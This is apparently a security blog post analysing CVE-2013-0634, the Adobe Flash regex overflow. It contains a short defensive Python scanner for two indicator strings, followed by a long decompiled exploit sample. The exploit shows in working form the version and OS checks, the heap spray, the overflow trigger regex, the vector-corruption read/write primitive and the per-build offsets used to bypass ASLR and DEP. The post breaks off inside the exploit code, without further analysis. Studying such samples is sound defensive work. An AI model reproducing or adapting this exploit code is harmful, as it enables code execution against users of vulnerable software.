[Happy New Year] CVE-2013-0634 POC Analysis

2013-2-12 02:02 8818

If you are still not on Weibo this new year you are hopelessly behind the times; follow me and I will follow back:
http://weibo.com/u/2853226971
1. Vulnerability description
Adobe Flash Player's ActionScript 3.0 regular-expression handling has an overflow that leads to arbitrary code execution,
and the exploit technique is extremely sophisticated, bypassing ASLR+DEP.
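A defender-side example added by the editor, not part of the original post and not code from the LadyBoyle sample: a small Python triage scanner that unwraps an FWS/CWS container and searches the decompressed body for two literal strings the decompiled sample further down carries in its constant pool, namely the overflow-trigger regex passed to RegExp and the SharedObject name it uses as a run-once-a-week marker. The make_swf helper and the sample bodies are constructed test inputs, and ZWS (LZMA) containers are deliberately reported as unparsed rather than handled.

```python
import struct
import zlib

# Literal strings from the decompiled LadyBoyle ActionScript quoted in this post.
# The regex is the pattern the sample feeds to RegExp to trigger the overflow;
# the SharedObject name is the local-storage marker it uses to run only once a week.
INDICATORS = {
    "trigger_regex": b"(?i)()()(?-i)||||||||||||||||||||||",
    "sharedobject_marker": b"ImplentenstWell",
}


def swf_body(data: bytes):
    """Return the decompressed SWF body for an FWS or CWS file, or None.

    SWF header: 3-byte signature, 1-byte version, 4-byte little-endian
    uncompressed length; a CWS body is a zlib stream.  ZWS (LZMA) is not
    handled here, so it comes back as None and is reported as unparsed.
    """
    if len(data) < 8:
        return None
    sig = data[:3]
    if sig == b"FWS":
        return data[8:]
    if sig == b"CWS":
        try:
            return zlib.decompress(data[8:])
        except zlib.error:
            return None
    return None


def scan_swf(data: bytes) -> dict:
    """Report which LadyBoyle indicators occur in the SWF body.

    ABC stores string constants as plain UTF-8, so a byte search over the
    decompressed body is enough for an unobfuscated sample like this one.
    """
    body = swf_body(data)
    if body is None:
        return {"parsed": False, "hits": []}
    hits = [name for name, needle in INDICATORS.items() if needle in body]
    return {"parsed": True, "hits": hits}


def make_swf(body: bytes, compress: bool) -> bytes:
    """Wrap a body in a minimal SWF container (constructed test input only)."""
    length = struct.pack("<I", 8 + len(body))
    if compress:
        return b"CWS" + bytes([11]) + length + zlib.compress(body)
    return b"FWS" + bytes([11]) + length + body


if __name__ == "__main__":
    # Constructed samples: one carrying the trigger regex, one benign.
    suspect = make_swf(b"\x10" + INDICATORS["trigger_regex"] + b"\x00", compress=True)
    benign = make_swf(b"DoABC\x00benign constant pool", compress=False)
    print(scan_swf(suspect))  # {'parsed': True, 'hits': ['trigger_regex']}
    print(scan_swf(benign))   # {'parsed': True, 'hits': []}
```

The sample builds its heap-spray regexes from random letters at run time, so only the fixed trigger pattern and the marker name are searchable as literals; a variant that assembled the trigger string at run time would evade this scan. Treat a hit as a triage signal for mail and web gateways, not as a substitute for updating Flash Player past the affected builds listed in the sample's version switch.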
2. Test environment
Adobe Flash Player 11.5.502.146
Office 2010
Windows XP SP3
3. Vulnerability analysis
LadyBoyle ActionScript:
package
{
    import __AS3__.vec.*;
    import flash.display.*;
    import flash.media.*;
    import flash.net.*;
    import flash.system.*;
    import flash.text.*;
    import flash.utils.*;

    public class LadyBoyle extends Sprite
    {
        private var the_x32_Class:Class;
        private var the_x64_Class:Class;
        public var version:Object;

        public function LadyBoyle()
        {
            var _loc_2:* = null;
            var _loc_23:* = NaN;
            var _loc_24:* = null;
            var _loc_25:* = 0;
            var _loc_26:* = 0;
            var _loc_27:* = null;
            var _loc_28:* = null;
            var _loc_29:* = null;
            var _loc_30:* = null;
            var _loc_31:* = 0;
            var _loc_32:* = 0;
            var _loc_33:* = 0;
            var _loc_34:* = undefined;
            var _loc_35:* = null;
            var _loc_36:* = 0;
            var _loc_37:* = 0;
            var _loc_38:* = 0;
            var _loc_39:* = 0;
            var _loc_40:* = 0;
            this.the_x32_Class = LadyBoyle_the_x32_Class;
            this.the_x64_Class = LadyBoyle_the_x64_Class;
            this.version = Capabilities.version.toLowerCase().toString();
            var _loc_1:* = 0;
            var _loc_3:* = 0;
            var _loc_4:* = new ByteArray();
            var _loc_5:* = new Vector.<Object>(0);
            var _loc_6:* = new Sound();
            var _loc_7:* = 0;
            var _loc_8:* = 0;
            var _loc_9:* = 0;
            var _loc_10:* = 0;
            var _loc_11:* = 0;
            var _loc_12:* = 0;
            var _loc_13:* = 0;
            var _loc_14:* = 0;
            var _loc_15:* = 0;
            var _loc_16:* = 0;
            var _loc_17:* = _loc_4;
            switch(this.version)
            {
                case "win 11,5,502,146":
                {
                    break;
                }
                case "win 11,5,502,135":
                {
                    break;
                }
                case "win 11,5,502,110":
                {
                    break;
                }
                case "win 11,4,402,287":
                {
                    break;
                }
                case "win 11,4,402,278":
                {
                    break;
                }
                case "win 11,4,402,265":
                {
                    break;
                }
                default:
                {
                    return this.empty();
                    break;
                }
            }
            var _loc_18:* = SharedObject.getLocal("ImplentenstWell");
            if (SharedObject.getLocal("ImplentenstWell").size != 0)
            {
                _loc_23 = new Date().time - _loc_18.data.now;
                if (_loc_23 > 7 * 24 * 60 * 60 * 1000)
                {
                    _loc_18.close();
                }
                else
                {
                    return this.empty();
                }
            }
            var _loc_19:* = Capabilities.os.toLowerCase().toString();
            switch(_loc_19)
            {
                case "windows 7":
                {
                    break;
                }
                case "windows server 2008 r2":
                {
                    break;
                }
                case "windows server 2008":
                {
                    break;
                }
                case "windows server 2003 r2":
                {
                    break;
                }
                case "windows server 2003":
                {
                    break;
                }
                case "windows xp":
                {
                    break;
                }
                case "windows vista":
                {
                    break;
                }
                default:
                {
                    return this.empty();
                    break;
                }
            }
            _loc_1 = 0;
            while (_loc_1 < 0x4000)
            {
                
                _loc_24 = "";
                _loc_3 = 0;
                while (_loc_3 < 42)
                {
                    
                    _loc_24 = _loc_24 + String.fromCharCode(this.randRange(97, 122));
                    _loc_3 = _loc_3 + 1;
                }
                new Vector.<Object>(16)[0] = new RegExp(_loc_24, "");
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[1] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[2] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[3] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[4] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[5] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[6] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[7] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[8] = new Vector.<Number>(16);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[9] = new Vector.<Object>(32);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[10] = new Vector.<Object>(32);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[11] = new Vector.<Object>(32);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[12] = new Vector.<Object>(32);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[13] = new Vector.<Object>(32);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[14] = new Vector.<Object>(32);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[15] = new Vector.<Object>(32);
                _loc_5[_loc_1] = new Vector.<Object>(16);
                _loc_1 = _loc_1 + 1;
            }
            _loc_1 = 0x2012;
            while (_loc_1 < (0x4000 - 1))
            {
                
                if (_loc_1 % 2 != 0)
                {
                    _loc_5[_loc_1][2] = null;
                }
                _loc_1 = _loc_1 + 1;
            }
            _loc_2 = "(?i)()()(?-i)||||||||||||||||||||||";
            var _loc_20:* = new RegExp(_loc_2, "");
            var _loc_21:* = false;
            var _loc_22:* = 0;
            _loc_1 = 0;
            while (_loc_1 < 0x4000)
            {
                
                if (_loc_21)
                {
                    break;
                }
                _loc_8 = 1;
                while (_loc_8 <= 8)
                {
                    
                    try
                    {
                        if ((_loc_5[_loc_1][_loc_8] as Vector.<Number>).length > 17)
                        {
                            _loc_7 = _loc_1;
                            _loc_22 = _loc_8;
                            _loc_21 = true;
                            break;
                        }
                    }
                    catch (e:Error)
                    {
                    }
                    _loc_8 = _loc_8 + 1;
                }
                _loc_1 = _loc_1 + 1;
            }
            if (!_loc_21)
            {
                while (1)
                {
                    
                }
            }
            if (this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17)[0] == 16)
            {
                _loc_9 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17)[1];
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[17] = this.UintToDouble(0xffffffff, _loc_9);
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[18] = this.UintToDouble(0x41414141, 0);
                _loc_21 = false;
                _loc_1 = 0;
                while (_loc_1 < 0x4000)
                {
                    
                    if (_loc_21)
                    {
                        break;
                    }
                    _loc_8 = 1;
                    while (_loc_8 <= 8)
                    {
                        
                        try
                        {
                            if (this.ReadDouble(_loc_5[_loc_1][_loc_8] as Vector.<Number>, 0)[0] == 0x41414141)
                            {
                                _loc_7 = _loc_1;
                                _loc_22 = _loc_8;
                                _loc_21 = true;
                                break;
                            }
                        }
                        catch (e:Error)
                        {
                        }
                        _loc_8 = _loc_8 + 1;
                    }
                    _loc_1 = _loc_1 + 1;
                }
                if (!_loc_21)
                {
                    while (1)
                    {
                        
                    }
                }
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffed] = this.UintToDouble(16, _loc_9);
                _loc_1 = 0;
                while (_loc_1 < 0x1000)
                {
                    
                    if (this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1)[1] == 32 && this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, (_loc_1 + 1))[0] == 1)
                    {
                        _loc_11 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, (_loc_1 + 1))[1] & 0xfffffff8;
                        _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1 + 2)[0] & 0xfffffff8;
                        _loc_13 = _loc_12;
                        break;
                    }
                    _loc_1 = _loc_1 + 1;
                }
                if (_loc_1 == 0x1000)
                {
                    (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
                    return;
                }
                _loc_1 = 0;
                while (_loc_1 < 0x4000)
                {
                    
                    _loc_8 = 1;
                    while (_loc_8 <= 8)
                    {
                        
                        if (!(_loc_1 == _loc_7 && _loc_8 == _loc_22))
                        {
                            _loc_5[_loc_1][_loc_8] = null;
                        }
                        _loc_8 = _loc_8 + 1;
                    }
                    _loc_1 = _loc_1 + 1;
                }
                _loc_1 = 1;
                while (_loc_1 < 4)
                {
                    
                    _loc_29 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17 * _loc_1 + (_loc_1 - 1));
                    _loc_30 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17 * (_loc_1 + 1) + _loc_1);
                    if (_loc_29[1] == _loc_9 && _loc_30[1] == _loc_9 && _loc_29[1] < _loc_29[0] && _loc_30[1] < _loc_30[0] && _loc_30[0] - _loc_29[0] == 144)
                    {
                        _loc_10 = _loc_29[0] - 144 * (_loc_1 + 1);
                        break;
                    }
                    _loc_1 = _loc_1 + 1;
                }
                if (_loc_10 == 0)
                {
                    (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
                    return;
                }
                _loc_1 = 0;
                while (_loc_1 < 1024 * 100)
                {
                    
                    _loc_17.writeUnsignedInt(0x41414141);
                    _loc_1 = _loc_1 + 1;
                }
                _loc_15 = (_loc_12 + 64 - _loc_10 - 8) / 8;
                _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_15 = (_loc_12 + 8 - _loc_10 - 8) / 8;
                _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_12 = _loc_12 + _loc_17.position;
                _loc_14 = _loc_17.position;
                _loc_15 = (_loc_11 - _loc_10 - 8) / 8;
                _loc_16 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_25 = 0;
                _loc_26 = 0;
                _loc_27 = Capabilities.version.toLowerCase();
                switch(_loc_27)
                {
                    case "win 11,5,502,146":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x1c0dc8;
                            _loc_26 = _loc_16 - 0x8c500;
                        }
                        break;
                    }
                    case "win 11,5,502,135":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x2293ab;
                            _loc_26 = _loc_16 - 0x8c590;
                        }
                        break;
                    }
                    case "win 11,5,502,110":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x186a6e;
                            _loc_26 = _loc_16 - 0x8c3d8;
                        }
                        break;
                    }
                    case "win 11,4,402,287":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x469196;
                            _loc_26 = _loc_16 - 0x8c2f4;
                        }
                        break;
                    }
                    case "win 11,4,402,278":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x12bca1;
                            _loc_26 = _loc_16 - 0x8c1b4;
                        }
                        break;
                    }
                    case "win 11,4,402,265":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x78f07b;
                            _loc_26 = _loc_16 - 0x8c1b4;
                        }
                        break;
                    }
                    default:
                    {
                        // Unsupported build: index 0x1fffffff wraps (0x1fffffff * 8 + 8 == 2^32) back onto the
                        // vector's own header, so this puts the original length (16) and header word (_loc_9)
                        // back and exits cleanly instead of leaving the corrupted vector behind.
                        (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
                        return;
                        break;
                    }
                }
                // Dereference the pointer-sized slot at _loc_26 to get the address that will actually be
                // called. On the 11.5 builds the slot is 8-byte aligned; on the 11.4 builds it sits 4 bytes
                // off, so the read starts one element earlier and takes the high dword.
